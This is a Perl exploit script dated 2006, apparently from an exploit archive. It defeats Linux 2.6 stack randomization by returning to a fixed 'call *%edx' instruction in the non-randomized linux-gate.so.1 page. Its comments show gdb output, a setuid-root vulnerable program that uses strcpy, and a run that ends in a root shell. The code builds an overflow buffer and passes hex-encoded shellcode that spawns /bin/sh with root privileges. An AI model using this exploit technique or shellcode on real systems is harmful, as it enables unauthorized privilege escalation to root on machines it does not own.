Exploit solution against Linux kernel 2.6 stack randomization using the call *%edx technique.
16d98d0ba424ee3cc5b8ecf2bce540a7d301dae45c7a1ab48f2ec42703fb7b08
#!/usr/bin/perl -w
use strict;
#
# [exp_call_rand.pl] Mon Apr 3 19:17:14 CEST 2006
#
# Exploit solution against 2.6 stack randomization
# Using the "call *%edx" technic.
#
# Copyright: bunker - https://rawlab.altervista.org
# 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
#
# EXPLANATION: In 2.6 kernel we have a ghost library named
# "linux-gate.so.1". It's a virtual DSO, a shared
# object exposed by the kernel at a fixed address
# in every process' memory. This part of memory
# isn't randomized, so we can explore it to find
# useful "call" or "jmp" instructions!
# In this example we find "call *%edx" in memory
# so we can execute shellcode passed to vulnerable
# file by second argument ;-)
#
#
# [Find "call *%edx" in memory]
#
# bunker@syn:~/vuln$ ldd vuln_prog
# linux-gate.so.1 => (0xffffe000) <--- NOT RANDOM
# libc.so.6 => /lib/tls/libc.so.6 (0xb7e84000)
# /lib/ld-linux.so.2 (0xb7fcd000)
#
# bunker@syn:~/vuln$ gdb vuln_prog
# (gdb) break main
# Breakpoint 1 at 0x80483ad
# (gdb) run
# Starting program: /home/bunker/vuln/vuln_prog
# Breakpoint 1, 0x080483ad in main ()
# (gdb) x/i 0xffffe000
# 0xffffe000: jg 0xffffe047
# (gdb)
# 0xffffe002: dec %esp
# (gdb)
# 0xffffe003: inc %esi
# ...
# (gdb)
# 0xffffe74f: call *%edx <- Interesting, use this!!
#
# bunker@syn:~/vuln$ cat vuln_prog.c
# int main(int argc, char **argv) {
# char buf[256];
# strcpy(buf, argv[1]);
# }
#
# bunker@syn:~/vuln$ ls -al vuln_prog
# -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 vuln_prog
#
# bunker@syn:~/vuln$ perl exp_call_rand.pl 68
# sh-3.1# id
# uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users)
die "Usage: $0 <num>\n [ vuln_buf < 4byte_ret * num ]\n"
if ($#ARGV != 0);
my $num = $ARGV[0];
print "Using multiplication factor $num...\n";
# call *%edx
my $ret = 0xffffe74f;
# shellcode
my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58".
"\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e".
"\x89\xe3\x52\x53\x89\xe1\xcd\x80";
# vulnerable file
my $vuln = "./vuln_prog";
# build buffer
my $buf = pack("L",$ret)x$num;
# boom! :-D
exec $vuln, $buf, $sc;